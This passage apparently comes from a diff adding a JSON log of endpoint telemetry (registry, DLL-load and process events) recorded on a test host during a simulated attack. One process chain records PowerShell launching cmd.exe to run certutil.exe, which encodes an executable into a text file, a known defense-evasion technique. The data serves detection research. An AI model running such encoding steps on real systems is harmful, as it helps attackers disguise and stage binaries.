"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573489490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573489490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573489490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573489490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573489490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573489490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573489490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573489490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573489490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573489490000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573489490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573489490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573489490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573489490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573489490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "pdh.dll", + "image_path": "C:\\Windows\\System32\\pdh.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "image_load", + "image_name": "perfos.dll", + "image_path": "C:\\Windows\\System32\\perfos.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573491520000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "registry", + "pid": 7036, + "process_name": "powershell.exe", + "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573494790000, + "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" + }, + { + "event_type": "registry", + "pid": 7036, + "process_name": "powershell.exe", + "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573494790000, + "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" + }, + { + "event_type": "registry", + "pid": 7036, + "process_name": "powershell.exe", + "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": 
"HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573494950016, + "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" + }, + { + "event_type": "registry", + "pid": 7036, + "process_name": "powershell.exe", + "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573494950016, + "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" + }, + { + "event_type": "registry", + "pid": 7036, + "process_name": "powershell.exe", + "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573494950016, + "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" + }, + { + "event_type": "registry", + "pid": 7036, + "process_name": "powershell.exe", + "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573494950016, + "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"certutil.exe -encode c:\\file.exe file.txt\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 204, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 
131883573496150000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-0010979B5501}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 204, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573496040000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-0010979B5501}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 204, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573496040000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-0010979B5501}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 204, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573496040000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-0010979B5501}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 204, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573496040000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-0010979B5501}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 204, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573496200016, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-0010979B5501}" + }, + { + "command_line": "certutil.exe -encode c:\\file.exe file.txt", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 904, 
+ "ppid": 204, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "subtype": "create", + "timestamp": 131883573496310000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}", + "unique_ppid": "{42FC7E13-CBE5-5C05-0000-0010979B5501}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496360000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573496360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573496360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496520000, + "unique_pid": 
"{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496520000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496520000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496520000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496520000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496520000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "crypt32.dll", + "image_path": "C:\\Windows\\System32\\crypt32.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496520000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": 
"image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496520000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "msasn1.dll", + "image_path": "C:\\Windows\\System32\\msasn1.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496520000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496520000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "certutil.exe", + "image_path": "C:\\Windows\\System32\\certutil.exe", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496360000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496670000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "comctl32.dll", + "image_path": "C:\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.17134.441_none_f952a0bb30955e96\\comctl32.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496670000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + 
}, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496670000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496830000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496830000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496830000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "setupapi.dll", + "image_path": "C:\\Windows\\System32\\setupapi.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496830000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "cfgmgr32.dll", + "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496830000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573496830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + 
"timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
